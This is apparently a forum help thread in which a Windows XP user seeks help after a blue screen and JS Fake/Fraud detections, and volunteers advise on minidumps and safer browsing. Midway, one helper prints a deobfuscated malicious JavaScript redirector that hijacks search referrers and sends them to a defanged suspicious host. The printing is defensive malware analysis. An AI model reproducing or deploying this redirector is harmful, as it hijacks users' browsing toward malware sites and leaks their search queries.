I had a blue screen recently but could not read what it was. meanwhile I did several scans and found JS Fraud with Kasperski and after scanned the folder with my resident Avast V. 4.8 Home. It found a trojan JS Fake in the same location and prompted me to send it to Chest. However, access was denied (maybe because I was in Safe Mode?) and next I deleted it successefully.

But I am worried that smehting maybe still lurking, especially as I found in one of the Avast logs the fllwoing which I had no idea had attacked me.

Any help much appreciated.

I think you have tried to access all those pr0n sites out there. haven’t you?.

Does that mean that you wll not help me?

Thanks

its like hitting your self with a sledge hammer, going to a doctor and asking whether he will treat you or not.

pr0n sites are the ones which host malware. they reach your computer before it is detected by someone. I would say not to visit any such sites.

Ok, I understand. But wil you help me?

Thanks

oki, which is your os?

Xp Home SP3

Thanks

go to c:\windows\ do you see any folder named minidump?

Yes and there are 3 icons in it

qim

Hi qim,

These are mainly finds because you surf to infested sites and the avast shield flags and then disconnects so you will not get infected.
As a second barrier against these sites you could consider to use the latest version of Firefox browser - get Firefox here: http://www.mozilla-europe.org/nl/firefox/
with the NoScript extension. Get NoScript here: https://addons.mozilla.org/nl/firefox/addon/722
Please make the links in your post non-clickable by using hXtp:// or wXw
Web page security reports for these sites were not available, and should be checked separately e.g. like this at: hXtp://charlescurtiss.com/speyq/ejwts/2.js

Exploits

No exploits were identified at wepawet scan. Obfuscation flagged by avast
eval exploit as http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Trojan:JS/Redirector.I

Deobfuscation results

Evals

function f(){
  var r = document.referrer, t = "", q;
  if (r.indexOf("google.") !=- 1)t = "q";
  if (r.indexOf("msn.") !=- 1)t = "q";
  if (r.indexOf("yahoo.") !=- 1)t = "p";
  if (r.indexOf("altavista.") !=- 1)t = "q";
  if (r.indexOf("aol.") !=- 1)t = "query";
  if (r.indexOf("ask.") !=- 1)t = "q";
  if (r.indexOf("comcast.") !=- 1)t = "q";
  if (r.indexOf("bellsouth.") !=- 1)t = "string";
  if (r.indexOf("netscape.") !=- 1)t = "query";
  if (r.indexOf("mywebsearch.") !=- 1)t = "searchfor";
  if (r.indexOf("peoplepc.") !=- 1)t = "q";
  if (r.indexOf("starware.") !=- 1)t = "qry";
  if (r.indexOf("earthlink.") !=- 1)t = "q";
  if (t.length && ((q = r.indexOf("?" + t + "=")) !=- 1 || (q = r.indexOf("&" + t + "="))^^
   !=- 1))window.location = ("hXtp://webtrustrank1.net/in.cgi?9&seoref=^^" + 
  encodeURIComponent(document.referrer) + ^^^^"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + 
  encodeURIComponent(document.URL) + "&default_keyword=default");
}
window.onFocus = f()
(repeated 1 time)[^broken by me -pol]

What is the present status of webtrustrank1.net?
The site hxtp://webtrustrank1.net is classified as suspicious - visiting this site can seriously damage your computer. This warning is given when third parties add malcode to trusted sites,

polonus

what are the extensions of the files in it?

Mini040307-01.dmp
Mini052109-01.dmp
Mini100109-01.dmp

qim

upload it to mediafire.com and give the link, let me see it. :-\

Hi Polonus

Thank you very much, but I am afraid I did not understand your post. What is the meaning of:

What is the present status of webtrustrank1.net?
The site hxtp://webtrustrank1.net is classified as suspicious - visiting this site can seriously damage your computer.

Nmb is helping me, by the way.

Thank you again

qim

Polonus is one of the senior guys out here in this field. I’m nothing in front of them.

Hi Nmb

I nver used Mediafire. It is uploading the 3 files. But how do you get them?

qim

it will give the link to download them. copy and paste the link here.

It means a very bad page http://www.mywot.com/en/scorecard/webtrustrank1.net

I’m not sure this is what you want…

Let me know

thanks

qim

yeah got them… but you need to click the share button on the right and it will give you a sharing url. you need to paste that here. remove the previous link you gave. i will see the dumps… will get back to you… in that time edit your posts. change all the http to hxxp and change you mediafire links.